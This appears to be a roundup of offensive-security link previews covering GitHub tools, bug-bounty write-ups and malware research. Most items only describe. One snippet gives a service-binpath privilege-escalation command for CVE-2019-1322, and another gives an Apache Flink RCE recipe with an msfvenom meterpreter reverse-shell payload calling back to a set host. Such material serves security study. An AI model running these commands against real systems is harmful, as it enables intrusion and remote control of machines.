Over the last few months, I’ve come across some implementations of JSON Web Tokens (JWTs) that have ultimately led to compromise of the…

Create tar/zip archives that can exploit directory traversal vulnerabilities - ptoomey3/evilarc

Hardware Hacking Cheatsheet infograph. Contribute to arunmagesh/hw_hacking_cheatsheet development by creating an account on GitHub.

Hi guys I hope you all are doing good so this write-up is all about the accidental IDOR that I found in the PRIVATE program so let assume…

Parse NTLM challenge messages over HTTP and SMB. Contribute to nopfor/ntlm_challenger development by creating an account on GitHub.

CVE-2019-1322  as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!

Summary There is a simple username enumeration issue in Office365’s ActiveSync, Microsoft do not consider this a vulnerability so Sec-1 do not expect this issue to be fixed. Sec-1 Penetration Tester Oliver Morton has written a script to exploit this which…

Intro

Research into how to decode the TRICKBOT config, quickly analyse to provide context and help incident response/blue teams.

Code Injection, Defense Evasion

【Apache Flink Dashboard 未授权访问-远程代码命令执行】 测试环境：1.9.1 1. upload a malicious JAR msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.20.166 LPORT=8989 -f jar > rce.jar 2. submit new job 3. getshell https://t.co/vOgoux5PhZ

A couple of months back, I took a part in researching dangers that come from Cache Probing Attack and new ways to exploit the…

James QuinnJames Quinn is a SOC Analyst for Binary Defense.  When he is not working at Binary Defense, he works as a freelance malware analyst and produces IOCs for the Cryptolaemus Emotet Group.

Zines about my personal learning. Contribute to tsluyter/Zines development by creating an account on GitHub.

Easy files and payloads delivery over DNS. Contribute to no0be/DNSlivery development by creating an account on GitHub.